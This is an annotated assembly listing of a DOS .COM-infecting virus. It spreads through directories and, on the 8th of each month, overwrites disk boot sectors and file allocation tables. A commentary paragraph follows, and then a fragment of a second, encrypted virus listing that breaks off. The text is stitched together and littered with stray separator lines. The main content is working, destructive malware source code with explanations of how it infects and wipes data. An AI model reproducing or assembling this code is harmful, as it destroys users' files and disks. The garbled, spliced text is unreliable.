data_7e equ 95h ; (76AC:0095=0A1h)
|
||||
data_8e equ 96h ; (76AC:0096=58h)
|
||||
data_9e equ 98h ; (76AC:0098=44A3h)
|
||||
data_10e equ 9Ah ; (76AC:009A=2601h)
|
||||
data_11e equ 9Eh ; (76AC:009E=0)
|
||||
data_12e equ 114h ; (76AC:0114=0BAh)
|
||||
data_13e equ 13Eh ; (76AC:013E=9Eh)
|
||||
data_14e equ 13Fh ; (76AC:013F=0)
|
||||
data_15e equ 140h ; (76AC:0140=21CDh)
|
||||
data_16e equ 142h ; (76AC:0142=0B4h)
|
||||
data_17e equ 143h ; (76AC:0143=3Dh)
|
||||
data_18e equ 144h ; (76AC:0144=2B0h)
|
||||
data_19e equ 146h ; (76AC:0146=9EBAh)
|
||||
data_20e equ 148h ; (76AC:0148=0)
|
||||
data_21e equ 14Bh ; (76AC:014B=8Bh)
|
||||
data_22e equ 17Ah ; (76AC:017A=40h)
|
||||
|
||||
code_seg_a segment
|
||||
assume cs:code_seg_a, ds:code_seg_a
|
||||
|
||||
|
||||
|
||||
tw proc far
|
||||
jmp short loc_a
|
||||
db 0B0h, 67h, 3Ch, 67h
|
||||
db 0CFh, 2Ah, 2Eh, 63h, 6Fh, 6Dh
|
||||
db 0, 2Ah, 0, 5Ch, 0, 2Eh
|
||||
db 2Eh, 0, 0, 5Ch, 0
|
||||
db 31h
|
||||
db 40 dup (0)
|
||||
db 64h, 0, 0, 0, 50h, 10h
|
||||
db 0, 0FCh, 0,
|
||||
loc_a: jmp short loc_1
|
||||
db 0EDh
|
||||
db 0D8h, 0CFh, 0CFh, 0DEh, 0C3h, 0C4h
|
||||
db 0CDh, 0D9h, 8Ah, 0CCh, 0D8h, 0C5h
|
||||
db 0C7h, 8Ah, 0E4h, 0CBh, 0DEh, 0C3h
|
||||
db 0C5h, 0C4h, 0CBh, 0C6h, 8Ah, 0E9h
|
||||
db 0CFh, 0C4h, 0DEh, 0D8h, 0CBh, 0C6h
|
||||
db 8Ah, 0FFh, 0C4h, 0C3h, 0DCh, 0CFh
|
||||
db 0D8h, 0D9h, 0C3h, 0DEh, 0D3h, 8Ah
|
||||
db 8Bh, 0Ah, 0Dh, 24h, 0E3h, 0D9h
|
||||
db 8Ah, 0DEh, 0C5h, 0CEh, 0CBh, 0D3h
|
||||
db 8Ah, 0D9h, 0DFh, 0C4h, 0C4h, 0D3h
|
||||
db 8Ah, 95h
|
||||
db 0Ah, 0Dh, 24h
|
||||
loc_1:
|
||||
cli ; Disable interrupts
|
||||
push es
|
||||
mov ax,0
|
||||
mov es,ax
|
||||
;
|
||||
; To begin, let's read and change some interrupts - replacing one with other
|
||||
;
|
||||
mov ax,es:data_1e ; (0000:0058=0A9Ch)
|
||||
mov ds:data_18e,ax ; (76AC:0144=2B0h)
|
||||
mov ax,es:data_2e ; (0000:005A=0D81h)
|
||||
mov ds:data_19e,ax ; (76AC:0146=9EBAh)
|
||||
mov word ptr es:data_1e,102h ; (0000:0058=0A9Ch)
|
||||
mov es:data_2e,cs ; (0000:005A=0D81h)
|
||||
pop es
|
||||
;
|
||||
; now reprogram the primary interrupt controller (the only one on the PC/XT)
|
||||
in al,21h ; port 21h, 8259-1 int IMR
|
||||
or al,2
|
||||
out 21h,al ; port 21h, 8259-1 int comands
|
||||
sti ; Enable interrupts
|
||||
mov cx,80h
|
||||
mov si,0
|
||||
mov bx,80h
|
||||
|
||||
locloop_2:
|
||||
mov ax,[bx+si]
|
||||
push ax
|
||||
inc si
|
||||
inc si
|
||||
loop locloop_2 ; Loop if cx > 0
|
||||
|
||||
mov byte ptr ds:data_12e,0 ; (76AC:0114=0BAh)
|
||||
mov byte ptr ds:data_13e,0 ; (76AC:013E=9Eh)
|
||||
mov byte ptr ds:data_14e,0 ; (76AC:013F=0)
|
||||
mov byte ptr ds:data_20e,0 ; (76AC:0148=0)
|
||||
mov ah,19h
|
||||
int 21h ; DOS Services ah=function 19h
|
||||
; get default drive al (0=a:)
|
||||
; then store it
|
||||
mov ds:data_12e,al ; (76AC:0114=0BAh)
|
||||
mov ds:data_17e,al ; (76AC:0143=3Dh)
|
||||
mov ah,47h
|
||||
mov dl,0
|
||||
mov si,116h
|
||||
int 21h ; DOS Services ah=function 47h
|
||||
; get full pathname for current drive
|
||||
; putting it in the buffer pointed to by SI
|
||||
push ds
|
||||
mov ax,0
|
||||
mov ds,ax
|
||||
mov al,ds:data_3e ; (0000:0475=2)
|
||||
pop ds
|
||||
mov ds:data_16e,al ; (76AC:0142=0B4h)
|
||||
cmp al,0
|
||||
je loc_3 ; Jump if equal (drive c)
|
||||
mov ah,0Eh
|
||||
mov dl,2
|
||||
mov ds:data_17e,dl ; (76AC:0143=3Dh)
|
||||
int 21h ; DOS Services ah=function 0Eh
|
||||
; set default drive C:
|
||||
loc_3:
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,10Fh
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path \
|
||||
loc_4:
|
||||
mov ah,4Eh ; 'N'
|
||||
mov cx,3
|
||||
mov dx,107h
|
||||
int 21h ; DOS Services ah=function 4Eh
|
||||
; find 1st filenam match (*.com)
|
||||
jnc loc_5 ; Jump if carry=0 (if found)
|
||||
jmp loc_8
|
||||
loc_5:
|
||||
mov ax,ds:data_8e ; (76AC:0096=58h)
|
||||
and ax,1Fh
|
||||
cmp al,1Fh
|
||||
jne loc_6 ; Jump if not equal
|
||||
jmp loc_7
|
||||
loc_6:
|
||||
; Now it has found a .COM file, opens it then writes itself to it
|
||||
; and here it makes it's biggest mistake: it writes itself to the OS files,
|
||||
; leaving them inoperational
|
||||
|
||||
mov ax,ds:data_10e ; (76AC:009A=2601h)
|
||||
mov ds:data_15e,ax ; (76AC:0140=21CDh)
|
||||
mov ah,43h ; 'C'
|
||||
mov al,1
|
||||
mov cl,ds:data_7e ; (76AC:0095=0A1h)
|
||||
and cx,0FEh
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; get/set file attrb, file found
|
||||
mov ah,3Dh ; '='
|
||||
mov al,2
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 3Dh
|
||||
; open file, al=mode,name@ds:dx
|
||||
mov bx,ax
|
||||
mov ah,3Fh ; '?'
|
||||
mov cx,2E7h
|
||||
mov dx,0F800h
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
mov ah,42h ; 'B'
|
||||
mov al,0
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov ah,40h ; '@'
|
||||
mov cx,2E7h
|
||||
mov dx,100h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
mov ah,42h ; 'B'
|
||||
mov al,2
|
||||
mov cx,0
|
||||
mov dx,0
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov ah,40h ; '@'
|
||||
mov cx,2E7h
|
||||
mov dx,0F800h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
mov ah,57h ; 'W'
|
||||
mov al,1
|
||||
mov cx,ds:data_8e ; (76AC:0096=58h)
|
||||
mov dx,ds:data_9e ; (76AC:0098=44A3h)
|
||||
or cl,1Fh
|
||||
int 21h ; DOS Services ah=function 57h
|
||||
; get/set file date & time
|
||||
mov ah,43h ; 'C'
|
||||
mov al,1
|
||||
mov cl,ds:data_7e ; (76AC:0095=0A1h)
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 43h
|
||||
; get/set file attrb, nam@ds:dx
|
||||
mov ah,3Eh ; '>'
|
||||
int 21h ; DOS Services ah=function 3Eh
|
||||
; close file, bx=file handle
|
||||
inc byte ptr ds:data_13e ; (76AC:013E=9Eh)
|
||||
cmp byte ptr ds:data_13e,3 ; (76AC:013E=9Eh)
|
||||
je loc_15 ; Jump if equal
|
||||
loc_7:
|
||||
mov ah,4Fh ; 'O'
|
||||
int 21h ; DOS Services ah=function 4Fh
|
||||
; find next filename match
|
||||
jc loc_8 ; Jump if carry Set (if no more .com files)
|
||||
jmp loc_5 ; infect next file
|
||||
|
||||
loc_8:
|
||||
; Now (I'm not sure about this) I think it's looking for subdirectories, so it can spread there
|
||||
; too.
|
||||
mov ah,4Eh ; 'N'
|
||||
mov dx,10Dh
|
||||
mov cx,12h
|
||||
int 21h ; DOS Services ah=function 4Eh
|
||||
; find 1st filenam match @ds:dx
|
||||
jc loc_13 ; Jump if carry Set
|
||||
|
||||
loc_9:
|
||||
cmp byte ptr ds:data_11e,2Eh ; (76AC:009E=0) '.'
|
||||
jne loc_11 ; Jump if not equal
|
||||
loc_10:
|
||||
mov ah,4Fh ; 'O'
|
||||
int 21h ; DOS Services ah=function 4Fh
|
||||
; find next filename match
|
||||
jnc loc_9 ; Jump if carry=0
|
||||
jmp short loc_13
|
||||
loc_11:
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,9Eh
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path @ ds:dx
|
||||
jc loc_10 ; Jump if carry Set
|
||||
mov cx,0Bh
|
||||
mov si,0
|
||||
mov bx,80h
|
||||
|
||||
locloop_12:
|
||||
mov ax,[bx+si]
|
||||
push ax
|
||||
inc si
|
||||
inc si
|
||||
loop locloop_12 ; Loop if cx > 0
|
||||
|
||||
inc byte ptr ds:data_14e ; (76AC:013F=0)
|
||||
jmp loc_4
|
||||
; yes, it should have been directories, for now it has changed the path and has gone
|
||||
; off infecting files again
|
||||
loc_13:
|
||||
; if it has found them all, it goes on to the next wickedness...
|
||||
cmp byte ptr ds:data_14e,0 ; (76AC:013F=0)
|
||||
je loc_15 ; Jump if equal
|
||||
dec byte ptr ds:data_14e ; (76AC:013F=0)
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,111h
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path @ ds:dx
|
||||
mov cx,0Bh
|
||||
mov di,14h
|
||||
mov bx,80h
|
||||
|
||||
locloop_14:
|
||||
pop ax
|
||||
mov [bx+di],ax
|
||||
dec di
|
||||
dec di
|
||||
loop locloop_14 ; Loop if cx > 0
|
||||
|
||||
mov ah,4Fh ; 'O'
|
||||
int 21h ; DOS Services ah=function 4Fh
|
||||
; find next filename match
|
||||
jc loc_13 ; Jump if carry Set
|
||||
jmp short loc_9
|
||||
loc_15:
|
||||
; Finally, it it wasn't bugged and very amateurish
|
||||
; (making the infected files useless)
|
||||
; it would check for a date and then destroy the current disk if it was that date
|
||||
; ( The 8 of each month. Why???)
|
||||
mov ah,2Ah ; '*'
|
||||
int 21h ; DOS Services ah=function 2Ah
|
||||
; get date, cx=year, dx=mon/day
|
||||
cmp dl,8
|
||||
jne loc_16 ; Jump if not equal
|
||||
mov byte ptr ds:data_20e,1 ; (76AC:0148=0)
|
||||
mov al,ds:data_17e ; (76AC:0143=3Dh)
|
||||
mov cx,0A0h
|
||||
mov dx,0
|
||||
mov bx,0
|
||||
int 26h ; Absolute disk write, drive al
|
||||
; Write over the boot sector (and the partition table, if it's a hard disk),
|
||||
;the root directory and probably both FATs (if the DOS partition is the first
|
||||
; on the HD, off course), then try doing the same to second HD)
|
||||
popf ; Pop flags
|
||||
cmp byte ptr ds:data_16e,2 ; (76AC:0142=0B4h)
|
||||
jne loc_17 ; Jump if not equal
|
||||
mov al,3
|
||||
mov cx,0A0h
|
||||
mov dx,0
|
||||
mov bx,0
|
||||
int 26h ; Absolute disk write, drive al
|
||||
popf ; Pop flags
|
||||
jmp short loc_17
|
||||
loc_16:
|
||||
mov ah,0Eh
|
||||
mov dl,ds:data_12e ; (76AC:0114=0BAh)
|
||||
int 21h ; DOS Services ah=function 0Eh
|
||||
; set default drive dl (0=a:)
|
||||
mov ah,3Bh ; ';'
|
||||
mov dx,115h
|
||||
int 21h ; DOS Services ah=function 3Bh
|
||||
; set current dir, path @ ds:dx
|
||||
; Now change the interrupts again
|
||||
loc_17:
|
||||
cli ; Disable interrupts
|
||||
push es
|
||||
mov ax,0
|
||||
mov es,ax
|
||||
mov ax,ds:data_18e ; (76AC:0144=2B0h)
|
||||
mov es:data_1e,ax ; (0000:0058=0A9Ch)
|
||||
mov ax,ds:data_19e ; (76AC:0146=9EBAh)
|
||||
mov es:data_2e,ax ; (0000:005A=0D81h)
|
||||
pop es
|
||||
in al,21h ; port 21h, 8259-1 int IMR
|
||||
and al,0FDh
|
||||
out 21h,al ; port 21h, 8259-1 int comands
|
||||
sti ; Enable interrupts
|
||||
cmp byte ptr ds:data_20e,1 ; (76AC:0148=0)
|
||||
jne loc_20 ; Jump if not equal
|
||||
mov cx,2Ch
|
||||
mov di,0
|
||||
mov bx,14Bh
|
||||
|
||||
locloop_18:
|
||||
xor byte ptr [bx+di],0AAh
|
||||
inc di
|
||||
loop locloop_18 ; Loop if cx > 0
|
||||
|
||||
mov cx,10h
|
||||
mov di,0
|
||||
mov bx,17Ah
|
||||
|
||||
locloop_19:
|
||||
; Finally write something on the screen, it seems like blanks
|
||||
; wait for for a keypress (doesn't matter which) then jump somewhere I can't understand.
|
||||
|
||||
xor byte ptr [bx+di],0AAh
|
||||
inc di
|
||||
loop locloop_19 ; Loop if cx > 0
|
||||
|
||||
mov ah,9
|
||||
mov dx,data_21e ; (76AC:014B=8Bh)
|
||||
int 21h ; DOS Services ah=function 09h
|
||||
; display char string at ds:dx
|
||||
mov ah,9
|
||||
mov dx,data_22e ; (76AC:017A=40h)
|
||||
int 21h ; DOS Services ah=function 09h
|
||||
; display char string at ds:dx
|
||||
mov ah,7
|
||||
int 21h ; DOS Services ah=function 07h
|
||||
; get keybd char al, no echo
|
||||
loc_20:
|
||||
mov cx,80h
|
||||
mov di,0FEh
|
||||
mov bx,80h
|
||||
|
||||
locloop_21:
|
||||
pop ax
|
||||
mov [bx+di],ax
|
||||
dec di
|
||||
dec di
|
||||
loop locloop_21 ; Loop if cx > 0
|
||||
|
||||
mov cx,8
|
||||
mov si,3DFh
|
||||
mov di,0F800h
|
||||
cld ; Clear direction
|
||||
rep movsb ; Rep while cx>0 Mov [si] to es:[di]
|
||||
mov cx,2E7h
|
||||
mov si,ds:data_15e ; (76AC:0140=21CDh)
|
||||
add si,100h
|
||||
jmp $+0 ;replaced a jump to an inexistant loc_22
|
||||
db 0BFh, 0, 1, 0F3h, 0A4h, 0E9h
|
||||
db 0F8h, 8, 0EBh
|
||||
db 5Dh
|
||||
db 93 dup (90h)
|
||||
db 0B8h, 0, 0, 0CDh, 21h
|
||||
db 643 dup (0)
|
||||
|
||||
tw endp
|
||||
|
||||
code_seg_a ends
|
||||
|
||||
|
||||
|
||||
end
|
||||
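Review bot: The listing never documents the infection marker it depends on, which is the one thing a defender reading it needs: at loc_5 the DTA time word (data_8e) is masked with 1Fh and compared with 1Fh to skip files already infected, and after the write the same field is forced with `or cl,1Fh` before function 57h restores the timestamp. A comment at loc_5 such as `; seconds/2 field == 1Fh (62 s, outside the valid 0-29 range) marks an infected file; usable as a scan heuristic` would make that explicit. The header states the listing re-assembles under MASM 5.1, yet the `jmp $+0` near the end of tw, substituted for a jump to a missing loc_22, appears to assemble to a jump to itself rather than the original jump, so a rebuilt image would not match the bytes it was taken from; that substitution deserves a comment giving the original target or a `db` of the original opcode bytes. The data_* equates also hide DTA and PSP offsets (80h, 96h, 9Eh) behind absolute addresses from one particular load; naming them (e.g. `DTA_TIME equ 96h`, `DTA_NAME equ 9Eh`) would let a reader verify the logic without the original memory dump.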
@ -0,0 +1,302 @@
PAGE 59,132
|
||||
|
||||
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
|
||||
;ロロ ロロ
|
||||
;ロロ TWELVE ロロ
|
||||
;ロロ ロロ
|
||||
;ロロ Created: 26-Apr-90 ロロ
|
||||
;ロロ Version: ロロ
|
||||
;ロロ Passes: 5 Analysis Options on: H ロロ
|
||||
;ロロ ロロ
|
||||
;ロロ ロロ
|
||||
;ロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロロ
|
||||
|
||||
data_1e equ 3366h ; (7415:3366=0)
|
||||
data_2e equ 7EF7h ; (7415:7EF7=0)
|
||||
data_3e equ 8C8Dh ; (7415:8C8D=0)
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
twelve proc far
|
||||
|
||||
start:
|
||||
;* jmp $+4h ;*
|
||||
db 0E9h, 1, 0
|
||||
db 21h, 46h, 0B8h, 9Bh, 1Ah, 0BFh
|
||||
db 2Bh, 1, 90h, 4Bh, 0F8h, 0FCh
|
||||
db 0B9h, 71h, 5, 31h, 0Dh, 2Bh
|
||||
db 0DAh, 33h, 0D9h, 2Bh, 0D9h, 2Bh
|
||||
db 0D8h, 90h, 33h, 0D1h, 31h, 5
|
||||
db 46h, 43h, 0F8h, 40h, 90h, 47h
|
||||
db 0E2h, 0E9h, 40h, 40h, 61h, 1Fh
|
||||
db 6Eh, 3, 0C9h, 82h, 6Fh, 36h
|
||||
db 0D1h, 5Ah, 8Bh, 33h, 0C3h, 6Bh
|
||||
db 0D5h, 0D7h, 85h, 0CCh, 17h, 4Eh
|
||||
db 0E9h, 0F3h, 7Ch, 0B1h, 29h, 52h
|
||||
db 0FBh, 0FFh, 74h, 0B5h, 2Bh, 56h
|
||||
db 0F9h, 0F3h, 64h, 0A9h, 0Dh, 32h
|
||||
db 9Bh, 97h, 1Ch, 0D5h, 7Fh, 64h
|
||||
db 82h, 7Bh, 0ADh, 94h, 1Eh, 61h
|
||||
db 6Ch, 29h, 7Dh, 0F3h, 4Ah, 0F7h
|
||||
db 0F4h, 4Ah, 0FEh, 0FFh, 1, 0
|
||||
db 51h, 7Ch, 7, 47h, 0DDh, 22h
|
||||
db 0CCh, 0EFh, 0D5h, 1Bh, 0F2h, 81h
|
||||
db 0DEh, 36h, 5Fh, 0D1h, 0D3h, 63h
|
||||
db 0FAh, 1Eh, 0CCh, 23h, 0E1h, 76h
|
||||
db 0ABh, 0Bh, 39h, 5Ch, 0DEh, 0B9h
|
||||
db 3, 0F4h, 7Eh, 21h, 74h, 31h
|
||||
db 0Ch, 0EFh, 59h, 9, 0D9h, 37h
|
||||
db 12h, 44h, 92h, 18h, 30h, 12h
|
||||
db 0ABh, 16h, 14h, 4Ch, 0BAh, 6Eh
|
||||
db 2Bh, 6Fh, 0F5h, 5Bh, 4Ch, 0F3h
|
||||
db 7Dh, 0Dh, 53h, 4Ah, 0F1h, 0F7h
|
||||
db 59h, 5Dh, 98h, 2, 0Fh, 29h
|
||||
db 8Bh, 0D0h, 5Ch, 0ADh, 29h, 54h
|
||||
db 3, 52h, 13h, 76h, 0D5h, 58h
|
||||
db 13h, 4, 0D7h, 63h, 39h, 74h
|
||||
db 8Bh, 7, 0FDh, 8Ah, 0F9h, 1Ah
|
||||
db 0D1h, 0F5h, 39h, 0EDh, 0BBh, 0C9h
|
||||
db 63h, 8Dh, 0B9h, 97h, 1Eh, 6Dh
|
||||
db 0BBh, 14h, 0EBh, 67h, 14h, 50h
|
||||
db 34h, 93h, 41h, 0D3h, 0D6h, 87h
|
||||
db 0FEh, 0CBh, 0F5h, 87h, 0F9h, 55h
|
||||
db 16h, 7, 39h, 49h, 0F5h, 0F3h
|
||||
db 0B6h, 0F0h, 64h, 0A5h, 21h, 57h
|
||||
db 28h, 2Ch, 0A9h, 0DCh, 6Dh, 8Fh
|
||||
db 7Fh, 5Eh, 0ABh, 21h, 66h, 1Ch
|
||||
db 6Ch, 35h, 63h, 0F7h, 4Ch, 0F5h
|
||||
db 0FDh, 0Ch, 59h, 78h, 6, 43h
|
||||
db 0BBh, 78h, 3Bh, 6Eh, 2Fh, 0B2h
|
||||
db 15h, 0AEh, 16h, 13h, 0D0h, 3Eh
|
||||
db 0F6h, 15h, 85h, 0DBh, 0A1h, 5Ch
|
||||
db 20h, 0CEh, 9Eh, 0F0h, 1Eh, 68h
|
||||
db 39h, 78h, 79h, 8, 0FDh, 0D7h
|
||||
db 0EAh, 0CBh, 0EAh, 87h, 0, 6Eh
|
||||
db 51h, 28h, 0D5h, 0D7h, 2Dh, 0A7h
|
||||
db 38h, 5Ch, 61h, 28h, 0D5h, 0DDh
|
||||
db 0A1h, 0Dh, 66h, 91h, 1Fh, 0A5h
|
||||
db 74h, 31h, 0Ah, 0F3h, 51h, 55h
|
||||
db 0C1h, 0F3h, 80h, 0Dh, 0ABh, 4Bh
|
||||
db 0EDh, 0ACh, 66h, 45h, 14h, 55h
|
||||
db 34h, 93h, 50h, 0BEh, 14h, 0DDh
|
||||
db 63h, 2Fh, 94h, 0D0h, 6Ch, 0Eh
|
||||
db 13h, 0Ch, 7Eh, 21h, 74h, 31h
|
||||
db 5Ch, 0FFh, 30h, 0D2h, 4Dh, 0F5h
|
||||
db 0C8h, 78h, 3Bh, 6Eh, 2Fh, 72h
|
||||
db 0D5h, 1Ah, 0F4h, 0A0h, 0D9h, 36h
|
||||
db 0B5h, 0D2h, 19h, 5Ch, 0Dh, 6Bh
|
||||
db 0EDh, 0B8h, 20h, 0D2h, 7Ch, 0B9h
|
||||
db 0Dh, 7Ah, 0ABh, 5, 49h, 0CCh
|
||||
db 4Ch, 0F4h, 0F5h, 78h, 3Bh, 6Eh
|
||||
db 2Fh, 83h, 12h, 0DDh, 33h, 0D8h
|
||||
db 41h, 31h, 0, 0D8h, 0E7h, 0D8h
|
||||
db 11h, 14h, 26h, 0ADh, 0DAh, 0E2h
|
||||
db 39h, 8Fh, 35h, 0F1h, 0BFh, 33h
|
||||
db 0CCh, 7Bh, 0F5h, 0F7h, 4Fh, 0F3h
|
||||
db 0EDh, 22h, 0CCh, 0A0h, 0D6h, 3Eh
|
||||
db 0C0h, 0D2h, 11h, 55h, 4, 1Fh
|
||||
db 0Ah, 83h, 1Dh, 82h, 21h, 6Ah
|
||||
db 45h, 0F0h, 0F5h, 3Bh, 15h, 9Ah
|
||||
db 79h, 6Bh, 0FDh, 72h, 34h, 2Ah
|
||||
db 0F1h, 3Fh, 89h, 0, 13h, 5Fh
|
||||
db 0E1h, 62h, 7Ah, 3Ch, 9Eh, 53h
|
||||
db 0Fh, 88h, 98h, 23h, 0B9h, 5Eh
|
||||
db 0CCh, 0DCh, 3Ch, 3Fh, 0Bh, 80h
|
||||
db 0A3h, 3, 31h, 3Eh, 0D4h, 0D7h
|
||||
db 0F4h, 3Bh, 3Dh, 0B0h, 0ABh, 1Fh
|
||||
db 21h, 34h, 17h, 28h, 0D5h, 1Fh
|
||||
db 0F9h, 0FEh, 18h, 0D7h, 19h, 1Bh
|
||||
db 90h, 95h, 5, 23h, 6Ah, 0FDh
|
||||
db 71h, 0F0h, 0F5h, 0AAh, 31h, 0FFh
|
||||
db 7Ch, 32h, 0D2h, 0F6h, 7Ch, 7Fh
|
||||
db 0ECh, 0EFh, 21h, 83h, 6Dh, 0EDh
|
||||
db 15h, 98h, 5Bh, 0EFh, 0D1h, 2Dh
|
||||
db 0A2h, 51h, 0FFh, 9Ah, 69h, 0EBh
|
||||
db 0EDh, 3Fh, 1Ch, 95h, 0Bh, 3Fh
|
||||
db 0FEh, 7Dh, 12h, 2Eh, 0F6h, 3Bh
|
||||
db 25h, 0A8h, 33h, 6Eh, 2Eh, 0F4h
|
||||
db 0D5h, 10h, 93h, 35h, 0DAh, 0DFh
|
||||
db 35h, 0C7h, 0D4h, 5Eh, 0ABh, 3Dh
|
||||
db 6Ch, 2Ch, 0FDh, 0F3h, 39h, 0D1h
|
||||
db 14h, 0B5h, 1Bh, 7Ch, 0FDh, 3Fh
|
||||
db 0B9h, 53h, 0F4h, 0F2h, 6Ch, 2Ch
|
||||
db 0FDh, 93h, 59h, 20h, 0CAh, 6Bh
|
||||
db 9Dh, 26h, 9Fh, 93h, 1Eh, 0E1h
|
||||
db 79h, 5Fh, 17h, 94h, 2Bh, 0D6h
|
||||
db 0F5h, 4, 51h, 78h, 0BBh, 11h
|
||||
db 0D6h, 34h, 0BAh, 5Dh, 7Eh, 0BDh
|
||||
db 1, 6Eh, 4, 65h, 0D6h, 0ECh
|
||||
db 1Ah, 0A7h, 0D4h, 65h, 0DDh, 0D3h
|
||||
db 3Dh, 61h, 0D5h, 38h, 0, 23h
|
||||
db 66h, 85h, 19h, 0A1h, 7Eh, 0Dh
|
||||
db 31h, 5Eh, 0E5h, 0CAh, 0F5h, 76h
|
||||
db 33h, 0A4h, 0EDh, 23h, 0D1h, 0AEh
|
||||
db 0D3h, 18h, 16h, 99h, 0CBh, 0EDh
|
||||
db 0B8h, 4Ch, 4Fh, 0FEh, 86h, 12h
|
||||
db 0E9h, 0E9h, 0EDh, 0A3h, 0Ah, 15h
|
||||
db 39h, 1Ah, 66h, 0DCh, 0C0h, 1Fh
|
||||
db 0F1h, 3Bh, 96h, 0E5h, 0F1h, 57h
|
||||
db 0EDh, 91h, 6Ch, 0D7h, 0D5h, 69h
|
||||
db 0DDh, 0DFh, 10h, 0F2h, 0A7h, 0D8h
|
||||
db 61h, 93h, 54h, 0ECh, 0EDh, 3Fh
|
||||
db 21h, 0A8h, 23h, 72h, 3Fh, 6Ch
|
||||
db 0FDh, 3Eh, 0D4h, 7Ch, 0A3h, 9
|
||||
db 66h, 0A1h, 15h, 12h, 74h, 77h
|
||||
db 6Ah, 12h, 54h, 80h, 9Dh, 2Bh
|
||||
db 94h, 0C0h, 58h, 0B2h, 59h, 0D1h
|
||||
db 20h, 0D2h, 4Dh, 0F6h, 0B6h, 78h
|
||||
db 0B3h, 9, 76h, 25h, 74h, 35h
|
||||
db 54h, 0F3h, 20h, 0CEh, 0F3h, 58h
|
||||
db 83h, 2Bh, 5Bh, 8Dh, 23h, 6Bh
|
||||
db 0C7h, 1Eh, 0F4h, 0C8h, 8Ch, 0E0h
|
||||
db 2Dh, 0DCh, 36h, 0C0h, 27h, 0C4h
|
||||
db 3, 78h, 18h, 40h, 0FDh, 0F2h
|
||||
db 0A2h, 1Fh, 5Bh, 0F3h, 2Eh, 64h
|
||||
db 0A3h, 0E3h, 94h, 0E6h, 29h, 92h
|
||||
db 9Ch, 0DEh, 55h, 81h, 0C4h, 0DEh
|
||||
db 0C4h, 0DAh, 3Ch, 26h, 64h, 0BDh
|
||||
db 5, 76h, 14h, 0F4h, 0FDh, 0AEh
|
||||
db 0BCh, 0C0h, 35h, 0Eh, 26h, 23h
|
||||
db 0B4h, 2Ch, 0B5h, 83h, 16h, 3Fh
|
||||
db 0Ch, 2Ch, 58h, 0Fh, 0A8h, 2Ah
|
||||
db 0DEh, 7, 5Eh, 12h
|
||||
loc_1:
|
||||
cmp al,0Fh
|
||||
mov bp,7E24h
|
||||
aas ; Ascii adjust
|
||||
lodsw ; String [si] to ax
|
||||
mov bl,2Ah ; '*'
|
||||
cld ; Clear direction
|
||||
mov bx,7E1Fh
|
||||
pop es
|
||||
push es
|
||||
push di
|
||||
db 2Eh, 55h, 0EDh, 93h, 7Dh, 49h
|
||||
db 6Ah, 18h, 5Fh, 0BCh, 0DBh, 75h
|
||||
db 0AEh, 0D1h, 73h, 0E6h, 1Eh, 2Ch
|
||||
db 0BEh, 78h, 29h, 0A7h, 0A3h
|
||||
db 78h
|
||||
|
||||
locloop_2:
|
||||
mov bh,ch
|
||||
add dh,ds:data_2e[si] ; (7415:7EF7=0)
|
||||
adc word ptr [bx],41h
|
||||
esc 7,cl ; coprocessor escape
|
||||
pop cx
|
||||
xchg ax,dx
|
||||
rcr cl,1 ; Rotate thru carry
|
||||
rcl byte ptr [di-68h],cl ; Rotate thru carry
|
||||
esc 2,ds:data_3e[di] ; (7415:8C8D=0) coprocessor escape
|
||||
sbb al,ds:data_1e[bx+si] ; (7415:3366=0)
|
||||
loc_3:
|
||||
mov bp,7EA5h
|
||||
adc word ptr [bx+di],0CD5Fh
|
||||
sti ; Enable interrupts
|
||||
ja loc_1 ; Jump if above
|
||||
db 0F2h, 0D3h, 0Bh, 7Bh, 0AAh, 0E8h
|
||||
db 0B3h
|
||||
db 4Bh, 4Dh
|
||||
loc_5:
|
||||
esc 3,[bp+si+4E0Eh] ; coprocessor escape
|
||||
movsb ; Mov [si] to es:[di]
|
||||
push ds
|
||||
adc [bp+0Bh],al
|
||||
popf ; Pop flags
|
||||
push si
|
||||
add al,dl
|
||||
db 6Fh, 0F3h, 0Fh, 54h, 0F9h, 0F3h
|
||||
db 76h, 0B9h, 11h, 0DEh, 90h, 0F7h
|
||||
db 56h, 0F7h, 0EDh
|
||||
loc_6:
|
||||
loopz locloop_2 ; Loop if zf=1, cx>0
|
||||
|
||||
;* jo loc_4 ;*Jump if overflow=1
|
||||
db 70h, 0D3h
|
||||
xlat [bx] ; al=[al+[bx]] table
|
||||
jbe loc_5 ; Jump if below or =
|
||||
esc 5,[si] ; coprocessor escape
|
||||
test cx,sp
|
||||
dec ax
|
||||
adc al,49h ; 'I'
|
||||
int 0BDh
|
||||
push di
|
||||
in ax,dx ; port 0, DMA-1 bas&add ch 0
|
||||
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
|
||||
call $-4A7Fh
|
||||
sbb ax,5E05h
|
||||
push bp
|
||||
jl loc_3 ; Jump if <
|
||||
das ; Decimal adjust
|
||||
dec si
|
||||
;* jmp short loc_7 ;*(04BD)
|
||||
db 0EBh, 0EDh
|
||||
db 18h, 0D3h, 49h, 36h, 95h, 9Dh
|
||||
